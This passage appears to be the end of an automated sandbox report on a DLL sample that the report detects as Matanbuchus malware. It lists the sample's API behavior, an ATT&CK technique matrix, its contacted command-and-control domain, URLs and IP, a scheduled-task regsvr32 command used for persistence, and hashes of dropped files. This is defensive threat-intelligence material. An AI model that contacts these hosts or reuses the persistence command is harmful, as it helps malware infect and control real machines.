                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_7EF678BF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_7EF676EA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_7EF677F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_7EF675C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_7EF672E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_7EF67248
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_7EF6736E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_7EF6101C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_7EF671FD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,3_2_7EF66F5B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_7EF60A9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_7FAD78BF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,5_2_7FAD77F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_7FAD76EA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,5_2_7FAD75C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_7FAD736E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FAD72E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FAD7248
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FAD71FD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,5_2_7FAD101C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,5_2_7FAD6F5B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FAD0A9F
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,9_2_7F096F5B
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,9_2_7F090A9F
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_7F0978BF
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,9_2_7F0977F0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_7F0976EA
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,9_2_7F0975C1
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_7F09736E
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,9_2_7F097248
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,9_2_7F0972E3
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,9_2_7F0971FD
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,9_2_7F09101C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF5B7F4 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,3_2_7EF5B7F4
                    Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		111
                    Process Injection                    		11
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Native API                    		Boot or Logon Initialization Scripts1
                    DLL Side-Loading                    		31
                    Virtualization/Sandbox Evasion                    		LSASS Memory41
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
                    Process Injection                    		Security Account Manager31
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information                    		NTDS1
                    System Network Configuration Discovery                    		Distributed Component Object ModelInput Capture4
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Rundll32                    		Cached Domain Credentials25
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592430 Sample: file.dll Startdate: 16/01/2025 Architecture: WINDOWS Score: 100 41 corepatchcraft.com 2->41 43 171.39.242.20.in-addr.arpa 2->43 51 Suricata IDS alerts for network traffic 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for URL or domain 2->55 57 3 other signatures 2->57 8 loaddll32.exe 1 2->8         started        10 regsvr32.exe 2->10         started        12 regsvr32.exe 2->12         started        14 regsvr32.exe 2->14         started        signatures3 process4 process5 16 rundll32.exe 13 8->16         started        21 cmd.exe 1 8->21         started        23 rundll32.exe 8->23         started        31 10 other processes 8->31 25 regsvr32.exe 6 10->25         started        27 regsvr32.exe 12->27         started        29 regsvr32.exe 14->29         started        dnsIp6 39 corepatchcraft.com 94.159.113.213, 443, 49709, 49710 NETCOM-R-ASRU Russian Federation 16->39 37 C:\Users\user\8f08\user-PC\user-PC.winmd, PE32 16->37 dropped 45 Found evasive API chain (may stop execution after checking mutex) 16->45 47 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->47 33 rundll32.exe 12 21->33         started        35 WerFault.exe 23->35         started        49 System process connects to network (likely due to code injection or exploit) 27->49 file7 signatures8 process9

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.dll11%ReversingLabsWin32.Trojan.Seheq
                    file.dll14%VirustotalBrowse

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\8f08\user-PC\user-PC.winmd11%ReversingLabsWin32.Trojan.Seheq

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php:100%Avira URL Cloudmalware
                    https://corepatchcraft.com/XH100%Avira URL Cloudmalware
                    https://corepatchcraft.com/kernel2.aspx100%Avira URL Cloudmalware
                    https://corepatchcraft.com/libraries_v2100%Avira URL Cloudmalware
                    https://corepatchcraft.com/lowedCert_AutoUpdate_1100%Avira URL Cloudmalware
                    https://corepatchcraft.com/100%Avira URL Cloudmalware
                    https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php9FPP/B100%Avira URL Cloudmalware
                    https://corepatchcraft.com/OeGc100%Avira URL Cloudmalware
                    https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php100%Avira URL Cloudmalware
                    https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.php(/100%Avira URL Cloudmalware
                    https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.phpssionKeyBackward100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    corepatchcraft.com
                    		94.159.113.213
                    		truetrue
                      		unknown
                      171.39.242.20.in-addr.arpa
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://corepatchcraft.com/updates/system-components/2025-release/updates_api.phptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://corepatchcraft.com/kernel2.aspxtrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://corepatchcraft.com/libraries_v2true
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://corepatchcraft.com/lowedCert_AutoUpdate_1rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php:rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://corepatchcraft.com/OeGcrundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php9FPP/Brundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.php(/rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://corepatchcraft.com/XHrundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://corepatchcraft.com/rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.phpssionKeyBackwardrundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        94.159.113.213
                        		corepatchcraft.comRussian Federation
                        		49531NETCOM-R-ASRUtrue

                        General Information

                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1592430
                        Start date and time:2025-01-16 06:01:05 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 50s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:30
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.dll
                        Detection:MAL
                        Classification:mal100.troj.evad.winDLL@38/6@3/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .dll

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.246.45, 40.126.32.133, 20.109.210.53, 20.242.39.171, 4.245.163.56
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, tile-service.weather.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        00:02:04API Interceptor87x Sleep call for process: rundll32.exe modified
                        00:02:05API Interceptor1x Sleep call for process: loaddll32.exe modified
                        00:02:09API Interceptor1x Sleep call for process: WerFault.exe modified
                        06:02:01Task SchedulerRun new task: {6065D4E8-FC9E-40FB-8AA5-D02559EB2738} path: C:\Windows\System32\regsvr32.exe s>-e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        NETCOM-R-ASRUkwari.ppc.elfGet hashmaliciousUnknownBrowse
                        • 94.159.123.201
                        428925288166115476.jsGet hashmaliciousStrela DownloaderBrowse
                        • 94.159.113.204
                        16263291112008113012.jsGet hashmaliciousStrela DownloaderBrowse
                        • 94.159.113.204
                        39837570410621389.jsGet hashmaliciousStrela DownloaderBrowse
                        • 94.159.113.204
                        2086614421560622407.jsGet hashmaliciousStrela DownloaderBrowse
                        • 94.159.113.204
                        18297197931254531734.jsGet hashmaliciousStrela DownloaderBrowse
                        • 94.159.113.204
                        29339317121867311987.jsGet hashmaliciousStrela DownloaderBrowse
                        • 94.159.113.204
                        1587812865951216473.jsGet hashmaliciousStrela DownloaderBrowse
                        • 94.159.113.204
                        jade.arm7.elfGet hashmaliciousMiraiBrowse
                        • 94.159.123.210
                        jade.spc.elfGet hashmaliciousMiraiBrowse
                        • 94.159.123.238

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e19Purchase Order No.5817-0001142025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 94.159.113.213
                        Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 94.159.113.213
                        153776434-874356550.05.exeGet hashmaliciousUnknownBrowse
                        • 94.159.113.213
                        download.bin.exeGet hashmaliciousNjrat, XRedBrowse
                        • 94.159.113.213
                        Handler.exeGet hashmaliciousDanaBot, PureLog Stealer, VidarBrowse
                        • 94.159.113.213
                        BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                        • 94.159.113.213
                        setup.msiGet hashmaliciousUnknownBrowse
                        • 94.159.113.213
                        00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                        • 94.159.113.213
                        00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                        • 94.159.113.213

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_248958ab5f2a895ffe68aaa21141f331da9f027_7522e4b5_9e13d90d-8b5b-43ad-92cc-05c42c9cbfa8\Report.wer

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.8412747748891497
                        Encrypted:false
                        SSDEEP:192:19NiwOD1U0BU/wjeTI/zuiFzZ24IO8dci:1XihDlBU/wjeuzuiFzY4IO8dci
                        MD5:CD3A3CD2CBC344EB014560E991D69F2A
                        SHA1:58C13CCFB0C7C3F33484DA094A5C78E0E4C0E86A
                        SHA-256:F3BB0F298819113C655D261E14C4485B046A0A67985A06F3B203EC9F4BE4383A
                        SHA-512:C3FE13CF07C6D955DF950A4BABD6C42F212EAB8AF38B336BA839E69EB864DA569EEFAAA6A9D7242E7886E4009495822E3D2FE3E6575EA684A7FC8B37B26B7905
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.7.7.3.2.6.8.5.3.9.3.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.7.7.3.2.7.3.6.9.5.5.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.1.3.d.9.0.d.-.8.b.5.b.-.4.3.a.d.-.9.2.c.c.-.0.5.c.4.2.c.9.c.b.f.a.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.e.b.c.2.6.3.-.7.9.8.2.-.4.b.6.0.-.8.9.c.e.-.a.9.4.1.1.5.c.a.a.2.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.c.0.-.0.0.0.1.-.0.0.1.5.-.f.a.c.1.-.a.8.c.9.d.3.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA3BC.tmp.dmp

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Jan 16 05:02:07 2025, 0x1205a4 type
                        Category:dropped
                        Size (bytes):41634
                        Entropy (8bit):1.9534291111696984
                        Encrypted:false
                        SSDEEP:192:WPULkFSezpO5H4x56aZW3c2L3nv5zHYlv0772K:Hezs5HOlW3c2DBzHYtK
                        MD5:ACE08A6DF93C6512F939F40AAF7B7A8A
                        SHA1:C81A7B4E31BE0362FEFBB670D713D2A04E2D9432
                        SHA-256:581B8AF1EA0DE0AA36FBB4CFAF68BC6546557396EBEECE8D696B0AF6B9920D4D
                        SHA-512:32BD5E6B284BF61E1E2367728C7043942A4B9E5CC1851DB85BCE7BCB767C7FC4BE0F43C113235F9A295F569B2B4DDCD4A53ED29D42C81429B1642DEC09E12072
                        Malicious:false
                        Preview:MDMP..a..... .........g.........................................'..........T.......8...........T..........................d...........P...............................................................................eJ..............GenuineIntel............T.............g.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA4A7.tmp.WERInternalMetadata.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8250
                        Entropy (8bit):3.689516905523936
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJYql6ICl/y6YpQB6jgmfTbqfprr89blbUsfy/jm:R6lXJp6ICI6Y6B6jgmfTe+lbHfi6
                        MD5:E6B496FE356F65DE6AB340FAB4AE2CCC
                        SHA1:57D0C506B0FC0C5E89A4EC4AE09194572FCDAFE2
                        SHA-256:3D900EB0D3D427CDD3C871F7BBF31DDB47DAEF69D2A90472B4423689B404A718
                        SHA-512:07478741160425610339DF5741077EDB58479C018612D088BD5E31426F32AF3B96575E89C7F00FCE79A03705F04258ECA798779E3D6CCD152D8B801E13E5F3A1
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.3.2.<./.P.i.

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA4E7.tmp.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4638
                        Entropy (8bit):4.4491689122403795
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zshJg77aI9ZjeWpW8VYlYm8M4JCdPvDFh1+q8/SRdGScSed:uIjfzI7/jf7VpJi1dJ3ed
                        MD5:094F551AE039B40B30F3F9678407F486
                        SHA1:A20BE86A3F2FC2B6318E664B51D7C21EB1019E53
                        SHA-256:B0FEAC1A4EDE9DEA1527772EDA872DAE50A1BD9716D87F6992BD54CBFE5B6816
                        SHA-512:574DFC5DF84EA4EBE41F812BA40169591FADD6323FE619741C9FE148402C0CED6DE2B93438CE5894D8F3512119409DB9A660A4320289F6DA56BF4019D430DD4B
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="678004" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                        C:\Users\user\8f08\user-PC\user-PC.winmd

                        Download File
                        Process:C:\Windows\SysWOW64\rundll32.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):281088
                        Entropy (8bit):6.562104950959375
                        Encrypted:false
                        SSDEEP:6144:pVN7/lxioKLkbHwggs6bAVASkqM98IDsCDvhhKgsQb:N/lYjcHDeSkqV8jvhhK9i
                        MD5:04089EB8F941DEE4F0FBBFEC314718D8
                        SHA1:CE07C536F70AF194A363F2C1A81D99680562C4A2
                        SHA-256:96678CACC0550C86D40B54672C15D1D3E35743FDDF3C2235C21FF636D4A8961D
                        SHA-512:B51B8E8E82BC1D9A1D8A0E5C86937B375544EE5A0CC4BEE8045D3504EE226E36F038461D3ED69EE9B92FCAF3121623A85D0206D596056AE8AD21EECB55EE3788
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\8f08\user-PC\user-PC.winmd, Author: Joe Security
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 11%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6=..Xn..Xn..XnW.[o..XnW.]o..XnW.\o..Xn.i]o..Xn.i\o..Xn.i[o..XnW.Yo..Xn..Yn..Xn.i]o..Xn.iXo..Xn.iZo..XnRich..Xn........PE..L....&.g.........."!...&......G.....{s.......0................................K...........@.....................................x.............................J..C......................................@............0...............................text...@........................... ..`.rdata.......0....... ..............@..@.data...,.F.........................@....reloc...C....J..D..................@..B........................................................................................................................................................................................................................................................................................................................................................

                        C:\Windows\appcompat\Programs\Amcache.hve

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1835008
                        Entropy (8bit):4.469388129310207
                        Encrypted:false
                        SSDEEP:6144:WzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNFjDH5S:4ZHtYZWOKnMM6bFpHj4
                        MD5:C3E56178D8EC7EDACB8CB1E58BDE3B51
                        SHA1:218F4879EB1741319ED8186AB36BEC16D244EE8F
                        SHA-256:17478373B9EBC2E122F9E26CDA7746101FDF151119A3E75520903DD47EDB6F07
                        SHA-512:6317DD7BF0534CA0CBB8BDAF8693ABE559BCC99E8A8C6AC89D0A87BE6B61C96C08D9055A0C5B014BD388E8E23689D8BE72C93B921CB26DEE7D33B2D78A4EEE53
                        Malicious:false
                        Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..R..g...............................................................................................................................................................................................................................................................................................................................................D.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Entropy (8bit):6.562104950959375
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.dll
                        File size:281'088 bytes
                        MD5:04089eb8f941dee4f0fbbfec314718d8
                        SHA1:ce07c536f70af194a363f2c1a81d99680562c4a2
                        SHA256:96678cacc0550c86d40b54672c15d1d3e35743fddf3c2235c21ff636d4a8961d
